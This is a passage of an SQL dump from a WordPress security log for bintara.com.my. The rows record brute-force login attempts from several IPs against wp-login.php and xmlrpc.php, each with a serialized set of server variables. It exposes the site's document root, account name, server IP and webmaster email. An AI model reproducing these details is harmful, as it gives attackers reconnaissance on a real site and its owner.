11:47:52',17906656,19232328,'https://bintara.com.my/wp-login.php',1,0,'68.183.130.158'),(24531,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.130.158\";s:11:\"REMOTE_PORT\";s:5:\"56346\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDH65S9022wVwVSW96TvgAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568720876.085\";s:12:\"REQUEST_TIME\";s:10:\"1568720876\";}}','notice','2019-09-17 11:47:57','2019-09-17 11:47:56',18257504,19557960,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.130.158'),(24532,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.153.203\";s:11:\"REMOTE_PORT\";s:5:\"49428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDJw1d3b0tfDgYOg7j0KwAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568721347.2658\";s:12:\"REQUEST_TIME\";s:10:\"1568721347\";}}','notice','2019-09-17 11:55:49','2019-09-17 11:55:47',17741072,19232200,'https://bintara.com.my/wp-login.php',1,0,'157.230.153.203'),(24533,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.153.203\";s:11:\"REMOTE_PORT\";s:5:\"50302\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDJx1d3b0tfDgYOg7j0MQAAAIQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568721351.4759\";s:12:\"REQUEST_TIME\";s:10:\"1568721351\";}}','notice','2019-09-17 11:55:52','2019-09-17 11:55:51',18254344,19550968,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.153.203'),(24534,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"52144\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDLN5S9022wVwVSW96UrgAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568721719.8922\";s:12:\"REQUEST_TIME\";s:10:\"1568721719\";}}','notice','2019-09-17 12:02:01','2019-09-17 12:02:00',17741368,19232600,'https://bintara.com.my/wp-login.php',1,0,'185.9.147.200'),(24535,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"52854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDLOrIp53uPsY7BKArvGAAAAFI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568721724.7615\";s:12:\"REQUEST_TIME\";s:10:\"1568721724\";}}','notice','2019-09-17 12:02:06','2019-09-17 12:02:05',18254056,19549928,'https://bintara.com.my/xmlrpc.php',1,0,'185.9.147.200'),(24536,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"58448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDL3Fd3b0tfDgYOg7j2IAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568721884.878\";s:12:\"REQUEST_TIME\";s:10:\"1568721884\";}}','notice','2019-09-17 12:04:46','2019-09-17 12:04:45',17741600,19233096,'https://bintara.com.my/wp-login.php',1,0,'178.128.68.121'),(24537,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"59588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDL4Vd3b0tfDgYOg7j2JAAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568721889.9696\";s:12:\"REQUEST_TIME\";s:10:\"1568721889\";}}','notice','2019-09-17 12:04:51','2019-09-17 12:04:50',18253808,19550136,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.68.121'),(24538,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"40644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDNzZS9022wVwVSW96VTwAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568722381.7118\";s:12:\"REQUEST_TIME\";s:10:\"1568722381\";}}','notice','2019-09-17 12:13:03','2019-09-17 12:13:02',17746696,19231944,'https://bintara.com.my/wp-login.php',1,0,'157.230.92.254'),(24539,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"40644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDNzZS9022wVwVSW96VTwAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568722381.7118\";s:12:\"REQUEST_TIME\";s:10:\"1568722381\";}}','notice','2019-09-17 12:13:03','2019-09-17 